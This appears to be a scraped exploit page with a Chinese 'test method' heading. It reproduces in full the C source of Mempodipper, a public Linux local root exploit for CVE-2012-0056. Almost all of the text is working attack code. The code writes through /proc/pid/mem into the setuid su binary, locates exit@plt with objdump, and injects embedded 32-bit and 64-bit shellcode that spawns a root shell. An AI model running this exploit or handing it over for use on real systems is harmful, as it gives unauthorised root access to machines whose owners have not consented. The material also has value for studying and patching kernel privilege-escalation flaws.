测试方法:

1. Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
2. Blog post about it is here: http://blog.zx2c4.com/749
4. # Exploit Title: Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit
5. # Date: Jan 21, 2012
6. # Author: zx2c4
7. # Tested on: Gentoo, Ubuntu
8. # Platform: Linux
9. # Category: Local
10. # CVE-2012-0056
12. /*
13. * Mempodipper
14. * by zx2c4
15. *
16. * Linux Local Root Exploit
17. *
18. * Rather than put my write up here, per usual, this time I've put it
19. * in a rather lengthy blog post: http://blog.zx2c4.com/749
20. *
21. * Enjoy.
22. *
23. * - zx2c4
24. * Jan 21, 2012
25. *
26. * CVE-2012-0056
27. */
28.  
29. #define _LARGEFILE64_SOURCE
30. #include <stdio.h>
31. #include <string.h>
32. #include <stdlib.h>
33. #include <sys/types.h>
34. #include <sys/stat.h>
35. #include <sys/socket.h>
36. #include <sys/un.h>
37. #include <fcntl.h>
38. #include <unistd.h>
39. #include <limits.h>
41. char *socket_path = "/tmp/.sockpuppet";
42. int send_fd(int fd)
43. {
44.     char buf[1];
45.     struct iovec iov;
46.     struct msghdr msg;
47.     struct cmsghdr *cmsg;
48.     struct sockaddr_un addr;
49.     int n;
50.     int sock;
51.     char cms[CMSG_SPACE(sizeof(int))];
52.     
53.     if ((sock = socket(AF_UNIX, SOCK_STREAM, 0)) < 0)
54.         return -1;
55.     memset(&addr, 0, sizeof(addr));
56.     addr.sun_family = AF_UNIX;
57.     strncpy(addr.sun_path, socket_path, sizeof(addr.sun_path) - 1);
58.     if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) < 0)
59.         return -1;
61.     buf[0] = 0;
62.     iov.iov_base = buf;
63.     iov.iov_len = 1;
65.     memset(&msg, 0, sizeof msg);
66.     msg.msg_iov = &iov;
67.     msg.msg_iovlen = 1;
68.     msg.msg_control = (caddr_t)cms;
69.     msg.msg_controllen = CMSG_LEN(sizeof(int));
71.     cmsg = CMSG_FIRSTHDR(&msg);
72.     cmsg->cmsg_len = CMSG_LEN(sizeof(int));
73.     cmsg->cmsg_level = SOL_SOCKET;
74.     cmsg->cmsg_type = SCM_RIGHTS;
75.     memmove(CMSG_DATA(cmsg), &fd, sizeof(int));
77.     if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
78.         return -1;
79.     close(sock);
80.     return 0;
81. }
83. int recv_fd()
84. {
85.     int listener;
86.     int sock;
87.     int n;
88.     int fd;
89.     char buf[1];
90.     struct iovec iov;
91.     struct msghdr msg;
92.     struct cmsghdr *cmsg;
93.     struct sockaddr_un addr;
94.     char cms[CMSG_SPACE(sizeof(int))];
96.     if ((listener = socket(AF_UNIX, SOCK_STREAM, 0)) < 0)
97.         return -1;
98.     memset(&addr, 0, sizeof(addr));
99.     addr.sun_family = AF_UNIX;
100.     strncpy(addr.sun_path, socket_path, sizeof(addr.sun_path) - 1);
101.     unlink(socket_path);
102.     if (bind(listener, (struct sockaddr*)&addr, sizeof(addr)) < 0)
103.         return -1;
104.     if (listen(listener, 1) < 0)
105.         return -1;
106.     if ((sock = accept(listener, NULL, NULL)) < 0)
107.         return -1;
108.     
109.     iov.iov_base = buf;
110.     iov.iov_len = 1;
112.     memset(&msg, 0, sizeof msg);
113.     msg.msg_name = 0;
114.     msg.msg_namelen = 0;
115.     msg.msg_iov = &iov;
116.     msg.msg_iovlen = 1;
118.     msg.msg_control = (caddr_t)cms;
119.     msg.msg_controllen = sizeof cms;
121.     if ((n = recvmsg(sock, &msg, 0)) < 0)
122.         return -1;
123.     if (n == 0)
124.         return -1;
125.     cmsg = CMSG_FIRSTHDR(&msg);
126.     memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
127.     close(sock);
128.     close(listener);
129.     return fd;
130. }
131.  
132. int main(int argc, char **argv)
133. {
134.     if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') {
135.         char parent_mem[256];
136.         sprintf(parent_mem, "/proc/%s/mem", argv[2]);
137.         printf("[+] Opening parent mem %s in child.\n", parent_mem);
138.         int fd = open(parent_mem, O_RDWR);
139.         if (fd < 0) {
140.             perror("[-] open");
141.             return 1;
142.         }
143.         printf("[+] Sending fd %d to parent.\n", fd);
144.         send_fd(fd);
145.         return 0;
146.     }
147.     
148.     printf("===============================\n");
149.     printf("=          Mempodipper        =\n");
150.     printf("=           by zx2c4          =\n");
151.     printf("=         Jan 21, 2012        =\n");
152.     printf("===============================\n\n");
153.     
154.     int parent_pid = getpid();
155.     if (fork()) {
156.         printf("[+] Waiting for transferred fd in parent.\n");
157.         int fd = recv_fd();
158.         printf("[+] Received fd at %d.\n", fd);
159.         if (fd < 0) {
160.             perror("[-] recv_fd");
161.             return -1;
162.         }
163.         printf("[+] Assigning fd %d to stderr.\n", fd);
164.         dup2(2, 6);
165.         dup2(fd, 2);
167.         unsigned long address;
168.         if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
169.             address = strtoul(argv[2], NULL, 16);
170.         else {
171.             printf("[+] Reading su for exit@plt.\n");
172.             // Poor man's auto-detection. Do this in memory instead of relying on objdump being installed.
173.             FILE *command = popen("objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
174.             char result[32];
175.             result[0] = 0;
176.             fgets(result, 32, command);
177.             pclose(command);
178.             address = strtoul(result, NULL, 16);
179.             if (address == ULONG_MAX || !address) {
180.                 printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
181.                 printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", argv[0], argv[0]);
182.                 return 1;
183.             }
184.             printf("[+] Resolved exit@plt to 0x%lx.\n", address);
185.         }
186.         printf("[+] Calculating su padding.\n");
187.         FILE *command = popen("su this-user-does-not-exist 2>&1", "r");
188.         char result[256];
189.         result[0] = 0;
190.         fgets(result, 256, command);
191.         pclose(command);
192.         unsigned long su_padding = (strstr(result, "this-user-does-not-exist") - result) / sizeof(char);
193.         unsigned long offset = address - su_padding;
194.         printf("[+] Seeking to offset 0x%lx.\n", offset);
195.         lseek64(fd, offset, SEEK_SET);
196.         
197. #if defined(__i386__)
198.         // See shellcode-32.s in this package for the source.
199.         char shellcode[] =
200.             "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
201.             "\x06\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
202.             "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
203.             "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
204.             "\x80";
205. #elif defined(__x86_64__)
206.         // See shellcode-64.s in this package for the source.
207.         char shellcode[] =
208.             "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
209.             "\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
210.             "\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
211.             "\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
212.             "\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
214. #else
215. #error "That platform is not supported."
216. #endif
217.         printf("[+] Executing su with shellcode.\n");
218.         execl("/bin/su", "su", shellcode, NULL);
219.     } else {
220.         char pid[32];
221.         sprintf(pid, "%d", parent_pid);
222.         printf("[+] Executing child from child fork.\n");
223.         execl("/proc/self/exe", argv[0], "-c", pid, NULL);
224.     }
225. }